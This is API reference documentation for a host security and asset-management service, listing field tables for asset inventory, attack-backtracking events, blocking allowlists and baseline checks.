Grayscale project configuration
Used by actions: DescribeABTestConfig.
Name | Type | Description |
---|---|---|
ProjectName | String | Greyscale project name |
Status | Boolean | true: grayscale release in progress; false: grayscale release not in progress. |
Account statistics data
Used by actions: DescribeAccountStatistics.
Name | Type | Description |
---|---|---|
Username | String | Username |
MachineNum | Integer | Number of hosts |
Information on alarms associated with the node
Used by actions: DescribeVertexDetail.
Name | Type | Description |
---|---|---|
AlarmId | String | Table names of IDs of alarms associated with the node. Separate multiple pairs with commas. Example: t1:id1,t2:id2 |
Status | Integer | Alarm status. This parameter takes effect when this node is an alarm node. |
Basic information on the resource management process
Used by actions: DescribeAssetAppList.
Name | Type | Description |
---|---|---|
MachineIp | String | Host private IP address |
MachineName | String | Host name |
MachineWanIp | String | Host public IP address |
Uuid | String | Host UUID |
Quuid | String | Host QUUID |
ProjectId | Integer | Host business group ID |
Tag | Array of MachineTag | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Application name |
Type | Integer | Application type 1: operations 2: database 3: Security 4: suspicious application 5: system architecture 6: system application 7: web service 99: other |
BinPath | String | Binary path |
OsInfo | String | Operating System Information |
ProcessCount | Integer | Number of associated processes |
Desc | String | Application description |
Version | String | Version No. |
ConfigPath | String | Configuration file path |
FirstTime | String | First collection time |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
IsNew | Integer | Whether the web service is newly added [0: no|1: yes] Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Software application-related process information
Used by actions: DescribeAssetAppProcessList, DescribeAssetJarInfo, DescribeAssetWebServiceProcessList.
Name | Type | Description |
---|---|---|
Name | String | Name |
Status | String | Process status |
Version | String | Process version |
Path | String | Path |
User | String | User |
StartTime | String | Startup time |
List of information on the asset management kernel module
Used by actions: DescribeAssetCoreModuleList.
Name | Type | Description |
---|---|---|
Name | String | Name |
Desc | String | Description |
Path | String | Path |
Version | String | Version |
MachineIp | String | Server IP |
MachineName | String | Server name |
OsInfo | String | Operating system |
Size | Integer | Module size |
ProcessCount | Integer | Number of dependent processes |
ModuleCount | Integer | Number of dependent modules |
Id | String | Module ID |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether new [0: no|1: yes] |
MachineWanIp | String | Server Public IP |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Details of the asset management kernel module
Used by actions: DescribeAssetCoreModuleInfo.
Name | Type | Description |
---|---|---|
Name | String | Name |
Desc | String | Description |
Path | String | Path |
Version | String | Version |
Size | Integer | Size |
Processes | String | Dependent processes |
Modules | String | Dependent modules |
Params | Array of AssetCoreModuleParam | Parameter information Note: This field may return null, indicating that no valid values can be obtained. |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
Parameters of the asset management kernel module
Used by actions: DescribeAssetCoreModuleInfo.
Name | Type | Description |
---|---|---|
Name | String | Name |
Data | String | Data |
Resource management database list information
Used by actions: DescribeAssetDatabaseList.
Name | Type | Description |
---|---|---|
MachineIp | String | Host private IP address |
MachineWanIp | String | Host public IP address |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
OsInfo | String | Operating System Information |
ProjectId | Integer | Host business group ID |
Tag | Array of MachineTag | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Database name |
Version | String | Version |
Port | String | Listening port |
Proto | String | Protocol |
User | String | Running user |
Ip | String | Bound IP |
ConfigPath | String | Configuration file path |
LogPath | String | Log file path |
DataPath | String | Data path |
Permission | String | Running permission |
ErrorLogPath | String | Error log path |
PlugInPath | String | Plugin path |
BinPath | String | Binary path |
Param | String | Startup parameter |
Id | String | Database ID |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether newly added [0: no|1: yes] |
MachineName | String | Host name |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Resource management database list information
Used by actions: DescribeAssetDatabaseInfo.
Name | Type | Description |
---|---|---|
MachineIp | String | Host private IP address |
MachineWanIp | String | Host public IP address |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
OsInfo | String | Operating System Information |
Name | String | Database name |
Version | String | Version |
Port | String | Listening port |
Proto | String | Protocol |
User | String | Running user |
Ip | String | Bind IP |
ConfigPath | String | Configuration file path |
LogPath | String | Log file path |
DataPath | String | Data path |
Permission | String | Running permission |
ErrorLogPath | String | Error log path |
PlugInPath | String | Plugin path |
BinPath | String | Binary path |
Param | String | Startup parameter |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
Asset management disk partition information
Used by actions: DescribeAssetDiskList, DescribeAssetMachineDetail.
Name | Type | Description |
---|---|---|
Name | String | Partition name |
Size | Integer | Partition size (unit: G) |
Percent | Float | Partition utilization |
Type | String | File system type |
Path | String | Mounting directory |
Used | Integer | Used space (unit: G) |
List of asset management environment variables
Used by actions: DescribeAssetEnvList.
Name | Type | Description |
---|---|---|
Name | String | Name |
Type | Integer | Type: 0: user variable 1: system variable |
User | String | Startup user |
Value | String | Environment variable value |
MachineIp | String | Server IP |
MachineName | String | Server name |
OsInfo | String | Operating system |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether new [0: no|1: yes] |
MachineWanIp | String | Server Public IP |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Container security
Description key-value pair filter, which is used for conditional filtering queries. For example, filter by ID, name, and status.
If there are multiple Filters, the logical relationship between them is AND.
If there are multiple Values in the same Filter, the logical relationship between the Values under the same Filter is OR.
Used by actions: DescribeAssetAppList, DescribeAssetCoreModuleList, DescribeAssetDatabaseList, DescribeAssetEnvList, DescribeAssetInitServiceList, DescribeAssetJarList, DescribeAssetPlanTaskList, DescribeAssetWebServiceInfoList, DescribeLoginWhiteHostList, ExportAssetAppList, ExportAssetCoreModuleList, ExportAssetDatabaseList, ExportAssetEnvList, ExportAssetInitServiceList, ExportAssetJarList, ExportAssetPlanTaskList, ExportAssetWebServiceInfoList.
Name | Type | Required | Description |
---|---|---|---|
Name | String | Yes | Name of filter key |
Values | Array of String | Yes | One or more filter values |
ExactMatch | Boolean | No | Whether to use fuzzy query |
List of asset management startup services
Used by actions: DescribeAssetInitServiceList.
Name | Type | Description |
---|---|---|
Name | String | Name |
Type | Integer | Type: 1: Encoder 2: IE plugin 3: Network provider 4: Mirror hijacking 5: LSA provider 6:KnownDLLs 7: Start execution 8:WMI 9: Scheduled task 10: Winsock provider 11: Print monitor 12: Resource manager 13: Driver service 14: Log-in |
Status | Integer | Default enabling status: 0 - disabled; 1 - enabled |
User | String | Startup user |
Path | String | Path |
MachineIp | String | Server IP |
MachineName | String | Name |
OsInfo | String | Operating system |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
UpdateTime | String | Data update time |
FirstTime | String | First collection time |
IsNew | Integer | Whether newly added [0: no|1: yes] |
MachineWanIp | String | Server Public IP |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
IsAutoRun | Integer | Start at boot [0: No|1: Yes] |
List of asset management JAR packages
Used by actions: DescribeAssetJarList.
Name | Type | Description |
---|---|---|
Name | String | Name |
Type | Integer | Type. 1: application; 2: system class library; 3: web service built-in library; 8: others. |
Status | Integer | Whether it is executable. 0: unknown; 1: yes; 2: no. |
Version | String | Version |
Path | String | Path |
MachineIp | String | Server IP address |
MachineName | String | Server name |
OsInfo | String | Operating system |
Id | String | JAR package ID |
Md5 | String | JAR package Md5 |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether it is newly added [0: no | 1: yes] |
MachineWanIp | String | Server public IP |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Asset management jar package details
Used by actions: DescribeAssetJarInfo.
Name | Type | Description |
---|---|---|
Name | String | Name |
Type | Integer | Type: 1: application; 2: system library; 3: Web service built-in library; 8: other |
Status | Integer | Whether executable: 0: unknown; 1: yes; 2: no |
Version | String | Version |
Path | String | Path |
MachineIp | String | Server IP |
MachineName | String | Server name |
OsInfo | String | Operating system |
Process | Array of AssetAppProcessInfo | Reference process list Note: This field may return null, indicating that no valid values can be obtained. |
Md5 | String | Jar package Md5 Note: This field may return null, indicating that no valid values can be obtained. |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
Generic data structure of Key-val type
Used by actions: DescribeAssetAppCount, DescribeAssetDatabaseCount, DescribeAssetHostTotalCount, DescribeAssetMachineTagTop, DescribeAssetPortCount, DescribeAssetProcessCount, DescribeAssetRecentMachineInfo, DescribeAssetTotalCount, DescribeAssetTypeTop, DescribeAssetUserCount, DescribeAssetWebAppCount, DescribeAssetWebFrameCount, DescribeAssetWebLocationCount, DescribeAssetWebServiceCount.
Name | Type | Description |
---|---|---|
Key | String | Tag |
Value | Integer | Quantity |
Desc | String | Description information Note: This field may return null, indicating that no valid values can be obtained. |
NewCount | Integer | Number of additions today Note: This field may return null, indicating that no valid values can be obtained. |
Asset management load information
Used by actions: DescribeAssetLoadInfo.
Name | Type | Description |
---|---|---|
MachineName | String | Host name |
Desc | String | Description |
Value | Float | Load |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
Resource load overview
Used by actions: DescribeAssetLoadInfo.
Name | Type | Description |
---|---|---|
Counts | Array of Integer | Load amount array, in ascending order: [ 0% or unknown quantity 0%~20% 20%~50% 50%~80% 80%~100% ] |
Top5 | Array of AssetLoadDetail | Top 5 Load Note: This field may return null, indicating that no valid values can be obtained. |
Basic information on the server list in asset fingerprint
Used by actions: DescribeAssetMachineList.
Name | Type | Description |
---|---|---|
Quuid | String | Server QUUID |
Uuid | String | Server UUID |
MachineIp | String | Private IP address of server |
MachineName | String | Server name |
OsInfo | String | Operating system name |
Cpu | String | CPU information |
MemSize | Integer | Memory capacity, in GB |
MemLoad | String | Memory utilization, in percentage |
DiskSize | Integer | Hard disk capacity, in GB |
DiskLoad | String | Hard disk utilization, in percentage |
PartitionCount | Integer | Number of partitions |
MachineWanIp | String | Host public IP address |
ProjectId | Integer | Business group ID |
CpuSize | Integer | CPU count |
CpuLoad | String | CPU utilization, in percentage |
Tag | Array of MachineTag | Tag Note: This field may return null, indicating that no valid values can be obtained. |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
IsNew | Integer | Whether it is newly added [0 - no;1 - yes] |
FirstTime | String | First collection time |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
CpuLoadNum | String | CPU load readings (only valid for Linux systems) Note: This field may return null, indicating that no valid values can be obtained. |
Basic information on the server list in asset fingerprint
Used by actions: DescribeAssetMachineDetail.
Name | Type | Description |
---|---|---|
Quuid | String | Server QUUID |
Uuid | String | Server UUID |
MachineIp | String | Private IP address of server |
MachineName | String | Server name |
OsInfo | String | Operating system name |
Cpu | String | CPU information |
MemSize | Integer | Memory capacity, in GB |
MemLoad | String | Memory utilization, in percentage |
DiskSize | Integer | Hard disk capacity, in GB |
DiskLoad | String | Hard disk usage, in percentage |
PartitionCount | Integer | Number of partitions |
MachineWanIp | String | Host public IP address |
CpuSize | Integer | Number of CPU |
CpuLoad | String | CPU load |
ProtectLevel | Integer | Protection Level. 0 Basic Edition; 1 Professional Edition; 2 Premium Edition; 3 General Discount Edition |
RiskStatus | String | Risk status: UNKNOW - unknown; RISK - risky; SAFT - Safe |
ProtectDays | Integer | Days protected |
BuyTime | String | Professional edition activation time |
EndTime | String | Professional edition expiration time |
CoreVersion | String | Kernel version |
OsType | String | linux/windows |
AgentVersion | String | Agent version |
InstallTime | String | Installation time |
BootTime | String | System startup time |
LastLiveTime | String | Last online time |
Producer | String | Manufacturer |
SerialNumber | String | Serial number |
NetCards | Array of AssetNetworkCardInfo | Network interface |
Disks | Array of AssetDiskPartitionInfo | Partition |
Status | Integer | 0: online; 1: offline |
ProjectId | Integer | Business group ID |
DeviceVersion | String | Server model |
OfflineTime | String | Offline time Note: This field may return null, indicating that no valid values can be obtained. |
InstanceId | String | Host ID Note: This field may return null, indicating that no valid values can be obtained. |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
CpuLoadVul | String | CpuLoadVul Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | Time Note: This field may return null, indicating that no valid values can be obtained. |
Asset management network interface information
Used by actions: DescribeAssetMachineDetail.
Name | Type | Description |
---|---|---|
Name | String | Network interface name |
Ip | String | IPv4 address |
GateWay | String | Gateway |
Mac | String | MAC address |
Ipv6 | String | IPv6 address |
DnsServer | String | DNS server |
List of asset management plan tasks
Used by actions: DescribeAssetPlanTaskList.
Name | Type | Description |
---|---|---|
Status | Integer | Default enabling status. 1 - enabled; 2 - not enabled |
Cycle | String | Execution cycle |
Command | String | Execute command or script |
User | String | Startup user |
ConfigPath | String | Configuration file path |
MachineIp | String | Server IP |
MachineName | String | Name |
OsInfo | String | Operating system |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether newly added [0: no|1: yes] |
MachineWanIp | String | Server Public IP |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Basic information of resource management account
Used by actions: DescribeAssetPortInfoList.
Name | Type | Description |
---|---|---|
MachineIp | String | Private IP address of the host |
MachineWanIp | String | Public IP address of the host |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
OsInfo | String | Operating System Information |
ProjectId | Integer | Host business group ID |
Tag | Array of MachineTag | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
ProcessName | String | Process name |
ProcessVersion | String | Process version |
ProcessPath | String | Process path |
Pid | String | Process ID |
User | String | Running user |
StartTime | String | Start time |
Param | String | Start parameter |
Teletype | String | Process TTY |
Port | String | Port |
GroupName | String | User group |
Md5 | String | Process MD5 |
Ppid | String | Parent process ID |
ParentProcessName | String | Parent process name |
Proto | String | Port protocol |
BindIp | String | Bound IP |
MachineName | String | Host name |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether to add [0: no | 1: yes] |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Basic information on the resource management process
Used by actions: DescribeAssetProcessInfoList.
Name | Type | Description |
---|---|---|
MachineIp | String | Host private IP address |
MachineWanIp | String | Host public IP address |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
OsInfo | String | Operating System Information |
ProjectId | Integer | Host business group ID |
Tag | Array of MachineTag | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Process name |
Desc | String | Process description |
Path | String | Process path |
Pid | String | Process ID |
User | String | Running user |
StartTime | String | Startup time |
Param | String | Startup parameter |
Tty | String | Process TTY |
Version | String | Process version |
GroupName | String | Process user group |
Md5 | String | Process MD5 |
Ppid | String | Parent process ID |
ParentProcessName | String | Parent process name |
Status | String | Process status |
HasSign | Integer | Digital signature. 0: no; 1: yes; 999: null (Windows only). |
InstallByPackage | Integer | Whether to install the package. 0: no; 1: yes; 999: null (Linux only). |
PackageName | String | Software package name |
MachineName | String | Host name |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether new [0: no|1: yes] |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Information on resource management system installation package list
Used by actions: DescribeAssetSystemPackageList.
Name | Type | Description |
---|---|---|
Name | String | Database name |
Desc | String | Description |
Version | String | Version |
InstallTime | String | Installation time |
Type | String | Type |
MachineName | String | Host name |
MachineIp | String | Host IP |
OsInfo | String | Operating system |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether newly added [0: no|1: yes] |
MachineExtraInfo | MachineExtraInfo | Additional information |
Quuid | String | Host ID |
Uuid | String | Agent Id |
Asset fingerprint type description
Used by actions: DescribeAssetTypes.
Name | Type | Description |
---|---|---|
Id | Integer | Type ID |
Name | String | Type name |
Resource management account basic information
Used by actions: DescribeAssetUserList.
Name | Type | Description |
---|---|---|
MachineIp | String | Host private IP address |
MachineWanIp | String | Host public IP address |
MachineName | String | Host name |
OsInfo | String | Operating System Information |
Uuid | String | Host UUID |
Quuid | String | Host QUUID |
Uid | String | Account UID |
Gid | String | Account GID |
Status | Integer | Account status. 0: disabled; 1: enabled |
IsRoot | Integer | Whether there is root permission. 0: no; 1: yes; 999: null (Linux only) |
LoginType | Integer | Log-in method. 0: log-in not allowed; 1: only key-based log-in allowed; 2: only password-based log-in allowed; 3: both key-based log-in and password-based log-in allowed; 999: null (Linux only) |
LastLoginTime | String | Last log-in time |
Name | String | Account name |
ProjectId | Integer | Host business group ID |
UserType | Integer | Account type. 0: guest user; 1: standard user; 2: administrator user; 999: null (Windows only) |
IsDomain | Integer | Whether a domain account. 0: no; 1: yes; 2: no; 999: null (Windows only) |
IsSudo | Integer | Whether there is sudo permissions: 1: yes; 0: No; 999: null (Linux only) |
IsSshLogin | Integer | Whether ssh log-in allowed. 1: yes; 0: no; 999: null (Linux only) |
HomePath | String | Home directory |
Shell | String | Shell path (Linux only) |
ShellLoginStatus | Integer | Whether shell log-in allowed. 0: no; 1: yes (Linux only) |
PasswordChangeTime | String | Password modification time |
PasswordDueTime | String | Password expiration time (Linux only) |
PasswordLockDays | Integer | Password locking time (unit: day): -1 - never locked; 999 - null (Linux only) |
PasswordStatus | Integer | Password status: 1 - normal; 2 - expiring soon; 3 - expired; 4 - locked; 999 - null (Linux only) |
UpdateTime | String | Update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether new [0: no|1: yes] |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Basic information for resource management account
Used by actions: DescribeAssetUserInfo.
Name | Type | Description |
---|---|---|
MachineIp | String | Host private IP address |
MachineName | String | Host name |
Uuid | String | Host UUID |
Quuid | String | Host QUUID |
Uid | String | Account UID |
Gid | String | Account GID |
Status | Integer | Account status. 0: disabled; 1: enabled. |
IsRoot | Integer | Whether there is root permission. 0: no; 1: yes; 999: null (Linux only). |
LastLoginTime | String | Last log-in time |
Name | String | Account name |
UserType | Integer | Account type. 0: guest user; 1: standard user; 2: administrator user; 999: null (Windows only). |
IsDomain | Integer | Whether the account is a domain account. 0: no; 1: yes; 999: null (Windows only). |
IsSshLogin | Integer | Whether SSH log-in allowed. 1: yes; 0: no; 999: null (Linux only). |
HomePath | String | Home directory |
Shell | String | Shell path (Linux only) |
ShellLoginStatus | Integer | Whether shell log-in allowed. 0: no; 1: yes (Linux only). |
PasswordChangeTime | String | Password modification time |
PasswordDueTime | String | Password expiration time (Linux only) |
PasswordLockDays | Integer | Password locking time (unit: day). -1: never locked; 999: null (Linux only). |
Remark | String | Remarks |
GroupName | String | User group name |
DisableTime | String | Account expiration time |
LastLoginTerminal | String | Last log-in terminal |
LastLoginLoc | String | Last log-in location |
LastLoginIp | String | Last log-in IP address |
PasswordWarnDays | Integer | Password expiration reminder, in days |
PasswordChangeType | Integer | Password change settings. 0: not allowed; 1: allowed. |
Keys | Array of AssetUserKeyInfo | User public key listNote: This field may return null, indicating that no valid values can be obtained. |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
Details of the asset management account key
Used by actions: DescribeAssetUserInfo, DescribeAssetUserKeyList.
Name | Type | Description |
---|---|---|
Value | String | Public key value |
Comment | String | Public key remarks |
EncryptType | String | Encryption method |
List of the information on the resource management web application
Used by actions: DescribeAssetWebAppList.
Name | Type | Description |
---|---|---|
MachineIp | String | Host private IP address |
MachineWanIp | String | Host public IP address |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
OsInfo | String | Operating system information |
ProjectId | Integer | Host business group ID |
Tag | Array of MachineTag | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Application name |
Version | String | Version |
RootPath | String | Root path |
ServiceType | String | Service type |
Domain | String | Site domain name |
VirtualPath | String | Virtual path |
PluginCount | Integer | Number of plugins |
Id | String | Application ID |
Desc | String | Application description |
MachineName | String | Host name |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether it is newly added [0: no | 1: yes] |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Details of web application plugin for asset management
Used by actions: DescribeAssetWebAppPluginList.
Name | Type | Description |
---|---|---|
Name | String | Name |
Desc | String | Description |
Version | String | Version |
Link | String | Link |
Resource management Web application list information
Used by actions: DescribeAssetWebFrameList.
Name | Type | Description |
---|---|---|
MachineIp | String | Host private IP address |
MachineWanIp | String | Host public IP address |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
OsInfo | String | Operating System Information |
ProjectId | Integer | Host business group ID |
Tag | Array of MachineTag | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Database name |
Version | String | Version |
Lang | String | Language |
ServiceType | String | Service type |
MachineName | String | Host name |
UpdateTime | String | Data update time |
FirstTime | String | First collection time |
IsNew | Integer | Whether new [0: no|1: yes] |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Path | String | Application path |
Asset management Web site list information
Used by actions: DescribeAssetWebLocationList.
Name | Type | Description |
---|---|---|
Uuid | String | Host UUID |
Quuid | String | Host QUUID |
MachineIp | String | Private IP address |
MachineWanIp | String | Public IP address |
MachineName | String | Host name |
OsInfo | String | Operating system |
Name | String | Domain name |
Port | String | Site port |
Proto | String | Site protocol |
ServiceType | String | Service type |
PathCount | Integer | Number of site paths |
User | String | Running user |
MainPath | String | Home directory |
MainPathOwner | String | Home directory owner |
Permission | String | Owner permissions |
ProjectId | Integer | Host business group ID |
Tag | Array of MachineTag | Host tag |
Id | String | Web site ID |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether the web service is newly added [0 - no|1 - yes] Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Asset management Web site list information
Used by actions: DescribeAssetWebLocationInfo.
Name | Type | Description |
---|---|---|
Name | String | Domain name |
Port | String | Site port |
Proto | String | Site protocol |
ServiceType | String | Service type |
SafeStatus | Integer | Security module status. 0: not enabled; 1: enabled; 999: null (nginx only) |
User | String | Running user |
MainPath | String | Home directory |
Command | String | Startup command |
Ip | String | Bind IP |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
Virtual directory of the asset management web site
Used by actions: DescribeAssetWebLocationPathList.
Name | Type | Description |
---|---|---|
VirtualPath | String | Virtual path |
RealPath | String | Physical path |
User | String | File owner |
Group | String | File group |
Permission | String | File permission |
List information on resource management Web service
Used by actions: DescribeAssetWebServiceInfoList.
Name | Type | Description |
---|---|---|
MachineIp | String | Private IP address of a host |
MachineWanIp | String | Public IP address of a host |
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
OsInfo | String | Operating System Information |
ProjectId | Integer | Host business group ID |
Tag | Array of MachineTag | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Database name |
Version | String | Version |
BinPath | String | Binary path |
User | String | Startup user |
InstallPath | String | Installation path |
ConfigPath | String | Configuration path |
ProcessCount | Integer | Number of associated processes |
Id | String | Web Service ID |
MachineName | String | Host name |
Desc | String | Description |
UpdateTime | String | Data update time Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First collection time |
IsNew | Integer | Whether newly added [0: no|1: yes] |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Attack backtracking
Used by actions: DescribeAttackSource.
Name | Type | Description |
---|---|---|
Nodes | Array of AttackSourceNode | Attack backtracking node description Note: This field may return null, indicating that no valid values can be obtained. |
Edges | Array of AttackSourceEdge | Attack backtracking node path Note: This field may return null, indicating that no valid values can be obtained. |
EventInfoParam | String | Parameters for requesting details on node-related events Note: This field may return null, indicating that no valid values can be obtained. |
Attack backtracking path description
Used by actions: DescribeAttackSource.
Name | Type | Description |
---|---|---|
From | String | Starting node |
To | String | Target node |
Attack backtracking event
Used by actions: DescribeAttackSourceEvents.
Name | Type | Description |
---|---|---|
EventType | Integer | Event type. 0: virus scanning; 1: abnormal log-in; 2: password cracking; 3: malicious request; 4: high-risk command. |
Content | String | [Virus scanning] Virus name: VirusName, file name: FileName, file path: FilePath, file size: FileSize, file MD5: MD5, first detection time: CreateTime, last detection time: LatestScanTime, severity description: HarmDescribe, fixing suggestion: SuggestScheme [Abnormal log-in] Source IP: SrcIp, location: Location, log-in username: UserName, log-in time: LoginTime [Password cracking] Source IP: SrcIp, location: City and Country, protocol: Protocol, log-in username: UserName, port: Port, attempt count: Count, first attack time: CreateTime, last attack time: ModifyTime [Malicious request] Malicious request domain name: Url, process: ProcessName, MD5: ProcessMd5, PID: Pid, request count: AccessCount, last request time: MergeTime, severity description: HarmDescribe, fixing suggestion: SuggestScheme [High-risk command] Hit rule name: RuleName, rule category: RuleCategory, command content: BashCmd, data source: DetectBy, Log-in user: User, PID: Pid, occurrence time: CreateTime, severity description: HarmDescribe, fixing suggestion: SuggestScheme |
CreatedTime | String | Intrusion time |
Level | Integer | Unified event risk level. 0: prompt; 1: low; 2: medium; 3: high; 4: critical. |
LevelZh | String | Risk level string in Chinese |
Id | Integer | Event ID |
Uuid | String | Host UUID |
Attack backtracking node
Used by actions: DescribeAttackSource.
Name | Type | Description |
---|---|---|
EventId | Integer | Event ID. If this parameter is left blank, no corresponding event exists. |
EventType | String | BRUTEFORCE: password cracking; MALWARE: Trojan; BASH: high-risk command; RISK_DNS: malicious request; LOGIN: cross-region log-in; HOST: host node; TIME_ORDER: general node. |
Ip | String | Node IP address. When the node is HOST, the value is the IP address of this node. |
Level | Integer | Level. 0: prompt; 1: low-risk; 2: medium-risk; 3: high-risk; 4: critical. |
NodeId | String | Node ID |
StartTime | String | Start time |
EndTime | String | End time |
NodeDesc | String | General node description |
TimeLineNum | Integer | Timeline number. Nodes with the same number belong to the same timeline. |
NodeDetail | String | Node details |
Block allowlist rules
Used by actions: CreateBanWhiteList, ModifyBanWhiteList.
Name | Type | Required | Description |
---|---|---|---|
Id | String | No | Allowlist IDs |
Remark | String | No | Allowlist aliases |
SrcIp | String | No | Block source IP |
ModifyTime | Timestamp | No | Time of modifying allowlists |
CreateTime | Timestamp | No | Time of creating allowlists |
Uuid | String | No | Machine associated with the allowlist Note: This field may return null, indicating that no valid values can be obtained. |
IsGlobal | Boolean | No | Whether the allowlist is global Note: This field may return null, indicating that no valid values can be obtained. |
Quuids | Array of String | No | Machine list associated with the allowlist Note: This field may return null, indicating that no valid values can be obtained. |
List of displayed blocking allowlist information, including the machine information
Used by actions: DescribeBanWhiteList.
Name | Type | Description |
---|---|---|
Id | String | Allowlist ID |
Remark | String | Allowlist alias |
SrcIp | String | Blocking source IP address |
ModifyTime | Timestamp | Allowlist modification time |
CreateTime | Timestamp | Allowlist creation time |
IsGlobal | Boolean | Whether the allowlist takes effect globally |
Quuid | String | Machine UUID |
Uuid | String | CWPP program UUID |
MachineIp | String | Machine IP address |
MachineName | String | Machine name |
Basic baseline information
Used by actions: DescribeBaselineBasicInfo.
Name | Type | Description |
---|---|---|
Name | String | Baseline name Note: This field may return null, indicating that no valid values can be obtained. |
BaselineId | Integer | Baseline ID Note: This field may return null, indicating that no valid values can be obtained. |
ParentId | Integer | Parent ID Note: This field may return null, indicating that no valid values can be obtained. |
Baseline Custom Rule ID and Name
Used by actions: DescribeIgnoreHostAndItemConfig.
Name | Type | Description |
---|---|---|
RuleId | Integer | Custom rule ID Note: This field may return null, indicating that no valid values can be obtained. |
RuleName | String | Custom Rule Name Note: This field may return null, indicating that no valid values can be obtained. |
Baseline details
Used by actions: DescribeBaselineDetail.
Name | Type | Description |
---|---|---|
Description | String | Baseline description Note: This field may return null, indicating that no valid values can be obtained. |
Level | Integer | Severity level Note: This field may return null, indicating that no valid values can be obtained. |
PackageName | String | Package name Note: This field may return null, indicating that no valid values can be obtained. |
ParentId | Integer | Parent ID Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Baseline name Note: This field may return null, indicating that no valid values can be obtained. |
Baseline check parameters
Used by actions: StartBaselineDetect.
Name | Type | Required | Description |
---|---|---|---|
PolicyIds | Array of Integer | No | Collection of check policies |
RuleIds | Array of Integer | No | Collection of check rules |
ItemIds | Array of Integer | No | Collection of check items |
HostIds | Array of String | No | Collection of checked server IDs |
Information on the host affected by baseline
Used by actions: DescribeBaselineEffectHostList.
Name | Type | Description |
---|---|---|
PassCount | Integer | Passed item Note: This field may return null, indicating that no valid values can be obtained. |
FailCount | Integer | Risky item Note: This field may return null, indicating that no valid values can be obtained. |
FirstScanTime | String | First check time Note: This field may return null, indicating that no valid values can be obtained. |
